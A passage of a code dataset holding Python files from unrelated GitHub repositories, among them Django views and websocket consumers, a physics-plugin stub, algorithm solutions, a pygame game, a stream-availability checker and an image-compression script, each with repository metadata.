= Course.objects.get(id=update_course)\n course.title = course_title\n course.status = course_status\n try:\n course.save()\n message_class = \"success\"\n course_message = \"Course updated successfully!\"\n except Exception:\n message_class = \"error\"\n course_message = \"There was an error when updating the course.\"\n\n remove_course_user_id = request.POST.get('remove_user')\n if remove_course_user_id:\n course_user = UserCourse.objects.get(course_id=course_id, user_id=remove_course_user_id)\n course_user.delete()\n\n new_course_user = request.POST.get('add_user_to_course')\n if new_course_user == 'add_new_course_user':\n course_user = request.POST.get('add_course_user')\n # check if user is already on a course\n user_on_course = UserCourse.objects.filter(user_id=course_user)\n if user_on_course.count() > 0:\n message = \"User is already enrolled on a course\"\n message_class = \"error-message\"\n else:\n user_course = UserCourse(user_id=course_user, course_id=course_id, status=1, created_date=timezone.now, updated_date=timezone.now)\n user_course.save()\n message = str(user_course.user.first_name) + \" has been added successfully\"\n message_class = \"success-message\"\n\n # get centre from user through UserCentre object\n user_centre = Centre.objects.get(course__id=course_id)\n # Get course object from parsed course_id\n course = Course.objects.get(id=course_id)\n\n # Get course users\n course_users = UserCourse.objects.filter(course_id=course_id)\n course_users_filter = UserCourse.objects.filter(course_id=course_id).values('user_id')\n\n # Get all centre users\n all_centre_users = UserCentre.objects.filter(centre_id=user_centre)\n all_centre_users_filter = UserCentre.objects.filter(centre_id=user_centre)\n\n invite_user_email = request.POST.get('invite_user_email')\n invite_user_first_name = request.POST.get('invite_user_first_name')\n current_site = get_current_site(request)\n register_url = current_site.domain + reverse(\"register\")\n\n if settings.EMAIL_USE_SSL is True:\n hypertext = \"https://\"\n else:\n hypertext = \"http://\"\n\n ctx = {}\n ctx[\"first_name\"] = invite_user_first_name\n ctx[\"centre_name\"] = user_centre.name\n ctx[\"course_name\"] = course.title\n ctx[\"register_url\"] = hypertext + current_site.domain + reverse(\"register\")\n\n emails = (invite_user_email,)\n if invite_user_email:\n send_email(request, \"course_invitation\", ctx, emails)\n\n try:\n available_centre_users = all_centre_users.exclude(user_id__in=course_users_filter)\n except ValueError:\n available_centre_users = None\n\n return render(\n request,\n 'domain_admin/edit_course.html',\n {\n 'title': 'Edit course',\n 'course': course,\n 'course_users': course_users,\n 'centre': user_centre,\n 'available_centre_users': available_centre_users,\n 'message': message,\n 'course_message': course_message,\n 'message_class': message_class\n }\n )\n\n","repo_name":"alastairwp/yourvoteapp","sub_path":"domain_admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17413379676","text":"# -*- coding: future_fstrings -*-\n\"\"\"JET specific plugin functions for FIRE.\n\nFunctions and top level variables in this file with appropriate names will be imported and used by FIRE to provide\nfunctionality and information specific to this machine.\n\nThe most important role of the machine plugin is to provide a means of looking up the tile surface 's' coordinate\nagainst which heat flux profiles etc are defined. Additional machine specific information and tools include\nidentifying sector numbers and other location based labels and plotting methods for visualising this information.\n\nAuthor: Tom Farley (tom.farley@ukaea.uk)\nCreated: 05-05-2020\n\"\"\"\nimport logging\n\nimport numpy as np\nfrom fire.plotting.plot_tools import create_poloidal_cross_section_figure\nfrom fire.geometry.s_coordinate import interpolate_rz_coords, separate_rz_points_top_bottom, get_nearest_rz_coordinates, get_nearest_boundary_coordinates\n\nfrom fire.geometry.geometry import cartesian_to_toroidal\n\nlogger = logging.getLogger(__name__)\n# logger.setLevel(logging.DEBUG)\n\n# ===================== PLUGIN MODULE ATTRIBUTES =====================\n# Required: Name of plugin module (typically name of machine == name of file), needed to be located as a plugin module\nmachine_plugin_name = 'jet'\n\n# Recommended\nmachine_name = 'JET' # Will be cast to lower case (and '-' -> '_') in FIRE\nplugin_info = {'description': 'This plugin supplies functions for JET specific operations/information'} # extra info\nlocation_labels_im = ['sector', 's_global'] # Parameters used to label coordinates across the whole image\n\n# Optional/other\nn_sectors = 8 # Used internally in funcs below\nfirst_sector_start_angle = 90 # TODO: Check\nsectors_clockwise = True # TODO: Check\n# Machine specific\nn_louvres_per_sector = 1 # TODO: Check\n\n# Boxes to pass to fire.s_coordinate.remove_false_rz_surfaces\nfalse_rz_surface_boxes_default = []\ns_start_coord_default = (0, 0)\n\n# Use same plugin funcs for machine sector and s_path coordinate as for MAST\nfrom fire.plugins.machine_plugins.tokamak_utils import get_s_coord_path\nfrom fire.plugins.machine_plugins.jet_tools.scoord import get_s_definition\n\n# See bottom of file for function aliases\n# ====================================================================\n\nmodule_default = object()\n\ndef get_wall_rz_coords():\n # Load the S coordinate defition.\n s, sR, sZ = get_s_definition(wall)\n return sR, sZ\n\ndef get_s_coord_global(x_im, y_im, z_im, **kwargs):\n \"\"\"Return JET tile s coordinates for all pixels in image.\n\n This 's' coordinate is considered 'global' as it is predefined for all (R, Z) surfaces as apposed to a 'local' s\n starting at 0m along a specific path.\n\n Args:\n x_im : x coordinates of each pixel in image\n y_im : y coordinates of each pixel in image\n z_im : z coordinates of each pixel in image\n **kwargs : Arguments passed to ...\n\n Returns: JET tile 's' coordinate for each pixel in the image\n\n \"\"\"\n logger.warning(f'\\n\\nUsing incorrect JET divertor \"s\" coordinates - NOT IMPLEMENTED\\n\\n')\n\n r_im, phi_im, theta_im = cartesian_to_toroidal(x_im, y_im, z_im)\n s_im = r_im\n return s_im\n\ndef get_jet_wall_coords(shot=50000, ds=None):\n \"\"\"Return (R, Z) coordinates of points defining wall outline of tile surfaces\n\n This is normally safe to call with default arguments.\n\n Args:\n shot: Shot number to get wall definition for\n\n Returns: Tuple of (R, Z) coordinate arrays\n\n \"\"\"\n raise NotImplementedError\n if ds is not None:\n r, z = interpolate_rz_coords(r, z, ds=ds, false_surface_boxes=false_rz_surface_boxes_default)\n return r, z\n\ndef get_tile_edge_coords_jet(shot=50000, subset=True):\n \"\"\"Return (R,Z) coords of main tile boundaries\n\n Args:\n shot: Shot number to get wall definition for\n\n Returns: Tuple of (R, Z) coordinate arrays\n\n \"\"\"\n raise NotImplementedError\n\n return r_tiles, z_tiles\n\ndef get_nearest_s_coordinates_jet(r, z, tol=5e-3, ds=1e-3, shot=50000):\n \"\"\"Return closest tile surface 's' coordinates for supplied (R, Z) coordinates\n\n Args:\n r: Array of radial R coordinates\n z: Array of vertical Z coordinates\n tol: Tolerance distance for points from wall - return nans if further away than tolerance\n ds: Resolution to interpolate wall coordinate spacing to in meters\n no_cal: Whether to use idealised CAD coordinates without spatial calibration corrections\n signal: UDA signal for wall coords\n shot: Shot number to get wall definition for\n\n Returns: Dict of s coordinates for top/bottom, (Array of 1/-1s for top/bottom of machine, Dict keying 1/-1 to s\n keys)\n\n \"\"\"\n raise NotImplementedError\n return s, (position, table_key)\n\n\n\ndef plot_vessel_outline_jet(ax=None, top=True, bottom=True, shot=50000, no_cal=False, aspect='equal', ax_labels=True,\n axes_off=False, show=True, **kwargs):\n import matplotlib.pyplot as plt\n raise NotImplementedError\n return fig, ax\n\n\ndef format_coord(coord, **kwargs):\n \"\"\"\n MAST-U coordinate formatter, includes sector number.\n\n Args:\n coord: Array of (x, y, z) coordinates describing a point in the machine\n\n Returns: String describing the position of the point within the machine\n\n \"\"\"\n x, y, z = coord[0], coord[1], coord[2]\n r, phi = cartesian_to_toroidal(x, y)\n\n sector = get_machine_sector(phi)\n\n formatted_coord = 'X,Y,Z: ( {:.3f} m , {:.3f} m , {:.3f} m )'.format(x, y, z)\n formatted_coord = formatted_coord + u'\\nR,Z,\\u03d5: ( {:.3f} m , {:.3f}m , {:.1f}\\xb0 )'.format(r, z, phi)\n formatted_coord = formatted_coord + '\\n Sector {:.0f}'.format(sector)\n\n return formatted_coord\n\ndef get_machine_sector(x, y, z=None):\n from fire.plugins.machine_plugins.tokamak_utils import (get_machine_sector)\n\n out = get_machine_sector(x, y, z=z, n_sectors=n_sectors, first_sector_start_angle=first_sector_start_angle,\n clockwise=sectors_clockwise)\n return out\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n\n pass","repo_name":"TomFarley/air","sub_path":"fire/plugins/machine_plugins/jet.py","file_name":"jet.py","file_ext":"py","file_size_in_byte":6131,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"70592321080","text":"class Solution:\n def rotate(self, matrix: list[list[int]]) -> None:\n bound0 = 0\n bound1 = len(matrix) - 1\n \n while bound0 < bound1:\n pivots = [\n [bound0, bound0],\n [bound0, bound1],\n [bound1, bound1],\n [bound1, bound0],\n ]\n for i in range(bound1 - bound0):\n tmp = matrix[pivots[3][0]][pivots[3][1]]\n for k in range(3, 0, -1):\n matrix[pivots[k][0]][pivots[k][1]] = matrix[pivots[k - 1][0]][pivots[k - 1][1]]\n matrix[pivots[0][0]][pivots[0][1]] = tmp\n\n pivots[0][1] += 1\n pivots[1][0] += 1\n pivots[2][1] -= 1\n pivots[3][0] -= 1\n\n bound0 += 1\n bound1 -= 1","repo_name":"chehsunliu/a","sub_path":"LeetCode/0048_rotate-image/20220526.py","file_name":"20220526.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16023149948","text":"import urllib3\npack1=( 'ABC DEF GHI' )\n\npack_var=maxx_pack1.split(\" \")\n\nbusss_pack2=('JKL MNO PQR ')\n\npack2=busss_pack2.split(\" \")\n\n\nsss_pack1=('WXY ZWA MMM')\n\nssss_pack1=sss_pack1.split(\" \")\n\nips={'z.z.z.z w.w.w.w'}\n\ndef south_channels():\n print('checking %d eeee pack1 channels in streamers' % len(pack_var))\n for vvv_channels in pack_var:\n for ip in ips:\n connection = urllib3.PoolManager()\n\n input=('%s:8006/Live/%s/STB.m3u8' % (ip,vvv_channels))\n r=connection.request(\"GET\", input)\n #print(r.status)\n if r.status != 200:\n print('%s channel was problem not connecting ' % vvv_channels)\n\n\ndef my_channels():\n print('checking %d dddd pack1 channels in streamers' % len(pack2))\n for vvv_channels_1 in pack2:\n for ip in ips:\n connection = urllib3.PoolManager()\n input=('%s:8006/Live/%s/STB.m3u8' % (ip,pack2))\n r=connection.request(\"GET\", input)\n #print(r.status)\n if r.status != 200:\n print('%s channel was problem not connecting' % vvv_channels_1 )\n\ndef my_channels2():\n print('checking %d cccc pack2 channels in streamers' % len(ssss_pack1))\n for bu_channels_2 in ssss_pack1:\n for ip in ips:\n connection = urllib3.PoolManager()\n\n input=('%s:8006/Live/%s/STB.m3u8' % (ip,bu_channels_2))\n r=connection.request(\"GET\", input)\n if r.status != 200:\n print('%s channel was problem not connecting ' % bu_channels_2)\n\n#\n#south_channels()\n#my_channels()\n#my_channels2()\n","repo_name":"Vasanth3g/python-test","sub_path":"streamer_verification.py","file_name":"streamer_verification.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42284006100","text":"import subprocess\nimport os\nimport time\nimport sys\nimport psutil\nimport argparse\n\n# https://manpages.ubuntu.com/manpages/focal/en/man1/pngcrush.1.html\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n '--selected_folders',\n '--folder',\n '--folders',\n action = 'extend',\n nargs = '+',\n type = str,\n metavar = 'models/',\n help = 'List of folders with subfolders to convert.'\n)\n\nparser.add_argument(\n '--rootonly',\n '--root',\n action = 'store_true',\n help = 'Just convert files in the root of the working directory.'\n)\n\nargs = parser.parse_args()\nselectedFolders = args.selected_folders\nrootOnly = args.rootonly\n\nallFiles = []\n\nrecursive = False\nverbose = True\n\nPNGCRUSH_ARGS = ['-brute', '-ow', '-rem', 'alla', '-m', '7', 'filename']\ninputFile = '.png'\n\ndef convertFolders(folders):\n if recursive:\n for folder in folders:\n if not os.path.exists(folder):\n continue\n for root, _, files in os.walk(folder):\n for file in files:\n if not file.endswith(inputFile): # Input file\n if verbose:\n print(\"Skipping %s\" % file)\n continue\n if verbose:\n print(\"Adding %s\" % file)\n file = os.path.join(root, file)\n allFiles.append(file)\n else:\n for file in os.listdir('.'):\n if not file.endswith(inputFile):\n if verbose:\n print(\"Skipping %s\" % file)\n continue\n if verbose:\n print(\"Adding in %s\" % file)\n allFiles.append(file)\n for file in allFiles:\n PNGCRUSH_ARGS[6] = file\n subprocess.run(['pngcrush'] + PNGCRUSH_ARGS)\n\ndef convertRoot():\n if recursive:\n for root, _, files in os.walk('.'):\n for file in files:\n if not file.endswith(inputFile): # Input file\n if verbose:\n print(\"Skipping %s\" % file)\n continue\n if verbose:\n print(\"Adding %s\" % file)\n file = os.path.join(root, file)\n allFiles.append(file)\n else:\n for file in os.listdir('.'):\n if not file.endswith(inputFile):\n if verbose:\n print(\"Skipping %s\" % file)\n continue\n if verbose:\n print(\"Adding in %s\" % file)\n allFiles.append(file)\n for file in allFiles:\n PNGCRUSH_ARGS[6] = file\n subprocess.run(['pngcrush'] + PNGCRUSH_ARGS)\n\n\nif selectedFolders:\n convertFolders(selectedFolders)\nelif rootOnly:\n convertRoot()\n","repo_name":"loonaticx/sketches","sub_path":"scripts/HardCrusher/Crush.py","file_name":"Crush.py","file_ext":"py","file_size_in_byte":2752,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"44022308220","text":"import sys\nfrom collections import deque, Counter, defaultdict\n\ninput = sys.stdin.readline\nMOD = (10**9+7)\n\ndef factorization(n):\n arr = []\n temp = n\n for i in range(2, int(-(-n**0.5//1))+1):\n if temp%i==0:\n cnt=0\n while temp%i==0:\n cnt+=1\n temp //= i\n arr.append([i, cnt])\n if temp!=1:\n arr.append([temp, 1])\n if arr==[]:\n arr.append([n, 1])\n return arr\n\n\ndef pow_k1(x, n):\n if n == 0:\n return 1\n K = 1\n while n > 1:\n if n % 2 != 0:\n K *= x\n x *= x\n n //= 2\n return K * x\n\n\ndef pow_k(x, n):\n if n == 0:\n return 1\n K = 1\n while n > 1:\n if n % 2 != 0:\n K *= x\n x *= x\n n //= 2\n x%=MOD\n return K * x\n\n\ndef main():\n n = int(input())\n al = list(map(int, input().split())) \n lcm_dic = defaultdict(int)\n for a in al:\n fac = factorization(a)\n for f in fac:\n lcm_dic[f[0]] = max(f[1], lcm_dic[f[0]])\n\n\n lcm = 1\n for prime, cnt in lcm_dic.items():\n lcm *= pow_k1(prime,cnt)\n\n \n ans = 0\n for a in al:\n ans += (lcm//a)%MOD\n # if ans >= MOD: ans%=MOD\n ans%=MOD\n\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"nami4mo/competitive-programming-problems","sub_path":"practice/abc126-211/abc152_e.py","file_name":"abc152_e.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21218121055","text":"import pygame\n\nimport enemys\nimport player\n\n#dimension\nSCREEN_WIDTH = 600\nSCREEN_HEIGHT = 400\n\n#color\nBLACK = (0,0,0)\nWHITE = (255,255,255)\n\nclass Game:\n #Fonction initiant les donnés du jeu\n def __init__(self, surface):\n self.surface = surface\n\n self.running = True\n self.play = False\n\n self.run_game = False\n self.nb_run_game = 0\n\n self.clock = pygame.time.Clock()\n\n self.tick = pygame.time.get_ticks()\n self.seconds = 0\n\n self.zone = pygame.Rect(0,0,SCREEN_HEIGHT, SCREEN_WIDTH)\n\n self.player = player.Player()\n self.asteroid = enemys.Asteroid()\n\n #Fonction gérant les events\n def handling_event(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self.running = False\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n self.asteroid.asteroid_y = 0\n self.asteroid.pos_asteroid = self.asteroid.asteroid.get_rect(x=self.asteroid.asteroid_x,y=self.asteroid.asteroid_y)\n self.seconds = 0\n self.run_game = True\n\n keys = pygame.key.get_pressed()\n # Axe verticale(y)\n if keys[pygame.K_z] or keys[pygame.K_UP]:\n self.player.velocity[1] = -1\n elif keys[pygame.K_s] or keys[pygame.K_DOWN]:\n self.player.velocity[1] = 1\n else :\n self.player.velocity[1] = 0\n\n # Axe horizontale(x)\n if keys[pygame.K_d] or keys[pygame.K_RIGHT]:\n self.player.velocity[0] = 1\n elif keys[pygame.K_q] or keys[pygame.K_LEFT]:\n self.player.velocity[0] = -1\n else:\n self.player.velocity[0] = 0\n\n if keys[pygame.K_ESCAPE]:\n pygame.quit()\n\n def update(self):\n self.player.move()\n self.asteroid.move()\n\n if self.asteroid.pos_asteroid.colliderect(self.player.rect):\n self.nb_run_game = 1\n self.run_game = False\n\n def text(self):\n self.global_font = pygame.font.SysFont('Courier New', 20)\n\n self.title_font = pygame.font.SysFont('Courier New', 45)\n self.title_text = self.title_font.render('SpaceShooter', 1, WHITE)\n\n self.begin_font = pygame.font.SysFont('Courier New', 20)\n self.begin_text = self.begin_font.render('Press \"enter\" for begin', 1, WHITE)\n\n self.lose_font = pygame.font.SysFont('Courier New', 25)\n self.lose_text = self.lose_font.render(('You had survive :'), 1, WHITE)\n self.lose_text_2 = self.lose_font.render((str(round((self.seconds / 60), 2)) + ' secondes' ), 1, WHITE)\n\n self.retry_font = pygame.font.SysFont('Courier New', 20)\n self.retry_text = self.retry_font.render('Press \"enter\" for retry', 1, WHITE)\n\n def display(self):\n self.surface.fill(BLACK)\n\n #limite le joueur dans l'écran\n self.player.rect.clamp_ip(self.zone)\n\n #Dessine les entités\n self.asteroid.draw(self.surface)\n self.player.draw(self.surface)\n\n\n pygame.draw.rect(self.surface, BLACK, self.zone, 1)\n\n if self.run_game == False and self.nb_run_game == 0:\n surface.blit(self.title_text, (40, 200))\n surface.blit(self.begin_text, (60, 350))\n\n if self.run_game == False and self.nb_run_game > 0:\n surface.blit(self.lose_text, (75, 200))\n surface.blit(self.lose_text_2, (120, 250))\n surface.blit(self.retry_text, (60, 350))\n \n\n pygame.display.flip()\n\n def run(self):\n while self.running:\n self.handling_event()\n self.text()\n self.display()\n\n if self.run_game == True:\n self.update()\n\n self.clock.tick(60)\n self.seconds = self.clock.get_time()\n\npygame.init()\nwindow_icon = pygame.image.load('Astreroïd_2.png')\n\nsurface = pygame.display.set_mode((SCREEN_HEIGHT, SCREEN_WIDTH))\npygame.display.set_caption('SpaceShooter')\npygame.display.set_icon(window_icon)\nsurface.fill(BLACK)\npygame.display.flip()\nlaunch = Game(surface)\nlaunch.run()\n\npygame.quit()","repo_name":"ImKarasu/SpaceShooter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"20816797193","text":"\nimport collections\nfrom typing import List,Optional\nimport copy\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n #守卫法(前插法)\n #反转序列法\n def reverseBetween(self, head: ListNode, left: int, right: int) -> ListNode:\n if left==right:\n return head\n dummyhead=ListNode(0,head)\n cur=head\n pre=dummyhead\n i=1\n while cur:\n if i==left:\n end=cur\n begin=cur.next\n cur1=cur.next\n cur2=cur.next.next\n for i in range(right-left):\n cur1.next=cur\n begin=cur1\n \n cur=cur1\n cur1=cur2\n if cur2:\n cur2=cur2.next\n \n pre.next=begin\n end.next=cur1\n return dummyhead.next\n i+=1\n pre=cur\n cur=cur.next\n return dummyhead.next\n\nsol=Solution()\nnode1=ListNode(5,None)\nnode2=ListNode(4,node1)\nnode3=ListNode(3,node2)\nnode4=ListNode(2,node3)\nnode5=ListNode(1,node4)\n\nnodenow=sol.reverseBetween(node5,2,4)\nwhile nodenow:\n print(nodenow.val)\n nodenow=nodenow.next","repo_name":"Reigo666/Leetcode","sub_path":"Reigo/leetcode/Python/92. 反转链表 II.py","file_name":"92. 反转链表 II.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40580517868","text":"def allianceOptions():\n print(\"You belong to the Alliance\\n\"\n \"A humble group of courageous hero's posed to protect Azeroth\\n\"\n \"From those who want to destroy it\")\n print(\"The next round of questions\\nWill deal with what type of race you are\\n\")\n print(\"there are 13 different races in total\\n\"\n \"7 in Alliance and 7 in horde\\n\"\n \"one race can be played in either Horde or Alliance\\n\"\n \"for Alliance there is Human, Dwarf, Night Elf, Gnome, Draenei and Worgen \\n\"\n \"and the Pandaren which is the one race that can be played on both sides.\\n\"\n \"In the Horde there is Orc, Undead, Tauren, Troll, Blood Elf and Goblin\\n\"\n \"as well as the Pandaren again.\")\n print(\"Each race has a certain amount of classes they can choose from that vary from race to race\\n\"\n \"but we will get into that later.\\n\"\n \"Since there are so many races there will be ten questions asked in this round.\\n\")\n print(\"So lets get started!!!\\n\\n\")\n\n race = ['NightElf', 'Dwarf', 'Human', 'Gnome', 'Draenei', 'Worgen', 'Pandaren']\n count = [0, 0, 0, 0, 0, 0, 0]\n\n from string import ascii_uppercase\n print(\"Are you more of , A. A person who enjoys being outside or B. A person who enjoys spending the day outside ?\")\n answer1 = input()\n while answer1 not in ascii_uppercase:\n print(\"Error, please print A or B.\", end=\"\")\n answer1 = input()\n if answer1 == \"A\":\n count[0] += 1\n elif answer1 == \"B\":\n count[1] += 1\n print(\"Do you A. Enjoy being in the dark or B. Enjoy being in the wilderness ?\")\n answer2 = input()\n while answer2 not in ascii_uppercase:\n print(\"Error, please print A or B.\", end=\"\")\n answer2 = input()\n if answer2 == \"A\":\n count[2] += 1\n elif answer2 == \"B\":\n count[3] += 1\n print(\"Are you someone who A.Sees the light as a source of pureness and power or B. Someone who prefers the \"\n \"shadows ?\")\n answer3 = input()\n while answer3 not in ascii_uppercase:\n print(\"Error, please print A or B.\", end=\"\")\n answer3 = input()\n if answer3 == \"A\":\n count[4] += 1\n elif answer3 == \"B\":\n count[5] += 1\n print(\"Are you A. Tranquil and clam minded or B. Head-fast and strong minded ?\")\n answer4 = input()\n while answer4 not in ascii_uppercase:\n print(\"Error, please print A or B.\", end=\"\")\n answer4 = input()\n if answer4 == \"A\":\n count[6] += 1\n elif answer4 == \"B\":\n count[0] += 1\n print(\"Do you enjoy A. building things or B. fixing things ?\")\n answer5 = input()\n while answer5 not in ascii_uppercase:\n print(\"Error, please print A or B.\", end=\"\")\n answer5 = input()\n if answer5 == \"A\":\n count[1] += 1\n elif answer5 == \"B\":\n count[2] += 1\n print(\"Would you be more inclined to A. Harness the power of the land or B. Harness the power of gems ?\")\n answer6 = input()\n while answer6 not in ascii_uppercase:\n print(\"Error, please print A or B.\", end=\"\")\n answer6 = input()\n if answer6 == \"A\":\n count[3] += 1\n elif answer6 == \"B\":\n count[4] += 1\n print(\"Are you the type of person to A. Embrace a family or B. embrace solidarity ?\")\n answer7 = input()\n while answer7 not in ascii_uppercase:\n print(\"Error, please print A or B.\", end=\"\")\n answer7 = input()\n if answer7 == \"A\":\n count[5] += 1\n elif answer7 == \"B\":\n count[6] += 1\n print(\"You have most in common with the,\", race[count.index(max(count))])\n\n\n","repo_name":"x4v13r1120/WoWCompabilityTest","sub_path":"alliance.py","file_name":"alliance.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11266264305","text":"from mautrix.util.async_db import UpgradeTable\n\nupgrade_table = UpgradeTable()\n\nfrom . import (\n v01_initial_revision,\n v02_message_oti,\n v03_portal_meta_set,\n v04_relay_mode,\n v05_remove_communities,\n v06_store_user_seq_id,\n v07_store_reaction_timestamp,\n v08_backfill_queue,\n v09_portal_infinite_backfill,\n v10_user_thread_sync_status,\n v11_user_thread_sync_done_flag,\n v12_puppet_contact_info_set,\n)\n","repo_name":"mautrix/facebook","sub_path":"mautrix_facebook/db/upgrade/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":365,"dataset":"github-code","pt":"40"} +{"seq_id":"33146449856","text":"import json\n\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nimport asyncio\nfrom . import kpi_websocket\nimport schedule\nimport time\nfrom asgiref.sync import sync_to_async\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n # Add the consumer to the \"chat\" channel group\n # print(self.scope[\"user\"])\n # print('paramsssssssssssss',self.scope[\"headers\"])\n # print('scope', self.scope)\n # print('qery_stringggg', self.scope['query_string'].decode())\n query_string=self.scope['query_string'].decode()\n machine_id = query_string.split('=')[1]\n print('machine_id connect ',machine_id)\n\n\n\n # paramsssssssssssss [(b'sec-websocket-version', b'13'), (b'sec-websocket-key', b'PID+IdLq/ts0PQ8qVc2xUQ=='), (b'connection', b'Upgrade'), (b'upgrade', b'websocket'),\n # (b'sec-websocket-extensions', b'permessage-deflate; client_max_window_bits'), (b'host', b'127.0.0.1:8000')]\n\n await self.channel_layer.group_add(str(machine_id)+'_io', self.channel_name)\n # group_name=self.scope[\"url_route\"][\"kwargs\"][\"group_name\"]\n # print('group_name',group_name)\n await self.accept()\n\n\n async def disconnect(self, close_code):\n query_string = self.scope['query_string'].decode()\n machine_id = query_string.split('=')[1]\n print('idddddddddddddddddddddddd',machine_id)\n await self.channel_layer.group_discard(str(machine_id)+'_io', self.channel_name)\n\n # Remove the consumer from the \"chat\" channel group\n # await self.channel_layer.group_discard(\"mqtt_data\", self.channel_name)\n\n\n async def receive(self, text_data):\n print('text',text_data)\n print('reciver ........scope', self.scope)\n\n\n # Send the processed data to the connected WebSocket clients\n await self.channel_layer.group_send(\"mqtt_data\", {\n \"type\": \"chat.message\",\n \"text\": text_data # Send the processed data as the message\n })\n # print('receive text_data',text_data)\n # await asyncio.sleep(5)\n\n async def chat_message(self, event):\n # print('ppppppp',self.scope.get('machine_id'))\n # print('selff',self)\n # # selff \n # print('scope',self.scope)\n # print('qery_stringggg',self.scope['query_string'].decode())\n print('event' , event)\n print('event text' , event[\"text\"])\n\n try:\n # Send the received data to the WebSocket connection\n await self.send(text_data=event[\"text\"])\n print(\"eventtttttttttttttttttttttttttt\")\n # await self.send(text_data=json.dumps(event[\"text\"]))\n await asyncio.sleep(1)\n except Exception as e:\n print(\"chat message error - \", e)\n\n#\n# # @sync_to_async\n# def test(self):\n# # machine_id = 'MI'\n# print('task function')\n#\n#\n# class myscheduler:\n# def __init__(self,machine):\n# self.machine_id=machine\n# print(self.machine_id)\n# # Initialize any class-specific variables here\n# # self.counter = 0\n# pass\n#\n# async def my_task(self):\n# await kpi_websocket.kpi_socket(self.machine_id)\n# # await kpi_websocket.kpi_socket(self.machine_id)\n# # loop = asyncio.new_event_loop()\n# # asyncio.set_event_loop(loop)\n# # loop.run_until_complete(kpi_websocket.kpi_socket(self.machine_id))\n#\n#\n# def start_scheduling(self):\n# # Schedule my_task to run every 2 seconds\n# schedule.every(2).seconds.do(self.my_task)\n#\n# while True:\n# schedule.run_pending()\n# time.sleep(1)\n#\n\n\nclass KpiConsumer(AsyncWebsocketConsumer):\n\n async def connect(self):\n try:\n query_string = self.scope['query_string'].decode()\n machine_id = query_string.split('=')[1]\n # if not machine_id:\n # await self.close()\n # return\n await self.channel_layer.group_add(str(machine_id)+'_kpi', self.channel_name)\n\n await self.accept()\n\n # Start calling kpi_socket function periodically\n self.machine_id = machine_id\n self.scheduler_task = asyncio.create_task(self.schedule_kpi_socket())\n except:\n print(\"errorrrrr\")\n\n async def disconnect(self, close_code):\n # Cancel the scheduler task when disconnecting\n if hasattr(self, 'scheduler_task'):# hasattr() function is an inbuilt utility function,\\\n # which is used to check if an object has the given named attribute and return true if present, else false.\n self.scheduler_task.cancel()\n\n await self.channel_layer.group_discard(str(self.machine_id)+'_kpi', self.channel_name)\n\n async def schedule_kpi_socket(self):\n while True:\n try:\n print(\"-----------------------------------------------\")\n print(\"-----------------------------------------------\")\n await kpi_websocket.kpi_socket(self.machine_id)\n # Adjust the sleep duration as needed (e.g., call every 10 seconds)\n await asyncio.sleep(2)\n except asyncio.CancelledError:\n # Task was canceled due to disconnection\n break\n\n async def kpiweb(self, event):\n try:\n await self.send(text_data=event[\"text\"])\n except Exception as e:\n print(\"kpi message error - \", e)\n\n","repo_name":"kavya-automac/Automac_project","sub_path":"Automac_main/Automac_machines_app/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":5533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37821874364","text":"import tensorflow as tf\n\n\ndef _parse_example(example_proto):\n feature_description = {\n \"font\": tf.io.FixedLenFeature([], tf.string, default_value=\"\")\n }\n\n parsed = tf.io.parse_example(example_proto, feature_description)\n tensor = tf.io.parse_tensor(parsed[\"font\"], tf.float32)\n tensor = tf.reshape(tensor, (52, -1, 2))\n\n return {\"font\": tensor}\n\n\ndef get_dataset(path):\n raw_dataset = tf.data.TFRecordDataset(path)\n dataset = raw_dataset.map(\n _parse_example, num_parallel_calls=tf.data.experimental.AUTOTUNE\n )\n return dataset\n\n\ndef get_batches(dataset, BATCH_SIZE=32, BUFFER_SIZE=10_000):\n dataset = dataset.shuffle(buffer_size=BUFFER_SIZE)\n batches = dataset.batch(BATCH_SIZE, drop_remainder=True).prefetch(\n tf.data.experimental.AUTOTUNE\n )\n return batches\n","repo_name":"mzguntalan/h-former","sub_path":"data/data_loading.py","file_name":"data_loading.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"10965183450","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport napari\nimport dask.array as da\n\n\ndef blended_img(\n viewer,\n index=(Ellipsis),\n contrast_limits=None,\n):\n \"\"\"Creates blended image\n\n Args:\n viewer (napari viewer object]): [description]\n index (tuple, optional): [description]. Defaults to 